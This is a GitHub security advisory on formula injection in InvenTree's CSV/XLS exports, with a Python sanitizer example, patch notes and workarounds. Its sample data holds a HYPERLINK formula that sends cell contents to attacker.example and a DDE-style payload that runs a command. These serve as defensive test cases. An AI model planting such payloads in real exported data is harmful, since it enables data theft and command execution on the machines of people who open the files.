
GHSA-7rq4-qcpw-74gq: Formula Injection in Exported Data

Impact

Datasets exported to file (e.g. CSV / XLS) are not sufficiently sanitized to neutralize potential formula injection. A cell value that begins with a formula trigger character (such as =, +, -, @, or a tab / carriage return) is written to the export verbatim, so a spreadsheet application opening the file may evaluate attacker-supplied data as a formula rather than displaying it as text.
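As an added illustration (not InvenTree's own export code or the fix in the patched releases), the following Python shows the neutralization the advisory calls for: every string cell that starts with one of the trigger characters listed in the OWASP CSV Injection reference is prefixed with a single quote so a spreadsheet treats it as literal text, while the csv module handles quoting of commas and embedded double quotes. The dataset, field names and function names are constructed for this example.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula (the set listed in the OWASP CSV Injection reference).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_trigger(value: str) -> bool:
    """True if a string cell would be evaluated as a formula by Excel/LibreOffice."""
    return value.startswith(FORMULA_TRIGGERS)


def sanitize_cell(value):
    """Neutralize formula injection in a single exported cell.

    Non-string values (numbers, None) are returned unchanged: a numeric -3 in a
    quantity column is legitimate data, not a formula. Strings that begin with
    a trigger character are prefixed with a single quote, which spreadsheet
    applications interpret as "display the rest as text".
    """
    if not isinstance(value, str):
        return value
    if is_formula_trigger(value):
        return "'" + value
    return value


def export_csv(fieldnames, rows) -> str:
    """Write rows (list of dicts) to CSV text with every cell sanitized.

    csv.DictWriter quotes fields containing commas, newlines or double quotes
    (doubling embedded quotes), so the sanitizer only adds the trigger prefix.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: sanitize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


# Constructed sample dataset (not real InvenTree data): the "description"
# column holds user-entered text of the kind an attacker controls.
SAMPLE_FIELDS = ["name", "description", "quantity"]
SAMPLE_ROWS = [
    {"name": "Resistor 10k", "description": "0805 SMD", "quantity": 250},
    {"name": "Widget",
     "description": '=HYPERLINK("http://attacker.example/?"&A1,"click")',
     "quantity": 1},
    {"name": "Bracket",
     "description": '@SUM(1+1)*cmd|" /C calc"!A0',
     "quantity": -3},
    {"name": "Cable", "description": "-1+1", "quantity": 0},
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_FIELDS, SAMPLE_ROWS))
```

The prefix is applied to any string starting with a trigger, so a text field such as "-1+1" is exported as "'-1+1" even when it was harmless; that is the intended trade-off, since the exporter cannot know which leading "-" or "+" a spreadsheet would have treated as a formula.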

Patches

  • The issue is addressed in the upcoming 0.8.0 release
  • The fix will also be back-ported to the 0.7.x branch and shipped in the 0.7.2 release

Workarounds

Users exporting untrusted data should open the resulting files in a protected / safe mode of their spreadsheet application (e.g. Protected View in Microsoft Excel), or in a plain text editor, so that cell contents are not evaluated as formulas.

References

  • https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73/
  • https://owasp.org/www-community/attacks/CSV_Injection

For more information

If you have any questions or comments about this advisory:


Moderate severity · GitHub Reviewed · Published Jun 17, 2022 in inventree/InvenTree · Updated Jun 17, 2022
